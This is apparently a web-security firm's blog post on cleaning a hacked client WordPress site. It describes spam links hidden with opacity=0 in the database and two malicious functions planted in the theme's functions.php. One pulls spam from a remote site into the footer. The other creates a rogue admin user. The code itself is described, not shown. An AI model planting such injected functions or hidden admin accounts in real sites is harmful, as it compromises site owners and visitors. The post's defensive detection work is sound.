Detecting malicious code on websites is best done with
artificial human both human and artificial intelligence. Automated methods have their place, but so do human eyes.
One of our client’s site was hacked again. This client has not signed up for an ongoing security package; so though they don’t benefit from the regular services provided by our security packages, they do benefit from our standard secure WordPress set-up.
We know that the weakness of this particular website is their host’s lack of care for best security practices. The host, who used to be one of the best of the bunch, has gone downhill in recent years. Their so-called “premium” hosting doesn’t allow us access to change any passwords; they use unsecure file ownership and permissions and don’t grant us permission to change them. Due to those permissions, we can’t remove themes that aren’t required. Unused files expand the possible attack surface area for a potential hacker. The hosting service has too many holes, and we can’t fix those. So the only viable option at this point is to encourage the client to switch to a secure host. With a secure host and a regular security package, the site will once again be secure.
The client plans to switch hosting companies very soon. In the meantime, they’ve requested that we scan their site for malware regularly.
Why do we need automatic scanners?
After this most recent hack, one of our scanners caught spam links that had been inserted into the database, but none of our automated scanning services could tell us much more about how they got there. We viewed the source code of one scanner, which showed us the code to search for in the database. We did that and removed the spam links manually. The hacker inserted spam links after the first paragraph of text on a page to try to avoid detection.
The spam links inserted used “opacity=0” to hide from website visitors. In this way, the links would only be visible to search engine crawlers.
Why do we need human methods for detecting malicious code?
Our automated scanning services were unable to detect malicious code in the files. I manually reviewed files on the server, and found these two sections of malicious code in the theme functions.php file. The hacker inserted the malicious code in the middle of the file, to better hide it.
This function inserts spam via the footer, by getting the spam contents from a separate website and outputting them on our client’s website. The $url5 is our client’s website address, and the file_get_contents function pulls spam content from another website, from a file using our client’s website name:
This function, also located in the theme functions.php file, programmatically creates a new WordPress admin user. (This user did not exist at this time but was found in a previous hack clean-up):
The failure of the automated methods to catch these functions is our reason for not relying on automated methods alone.In website security, multi-layer security is a must. Click To Tweet
With both automated methods and human eyes, detecting malicious code becomes quicker and more efficient. Remember that artificial intelligence is always based on human intelligence. So machines are faster, but humans will always remain one step ahead.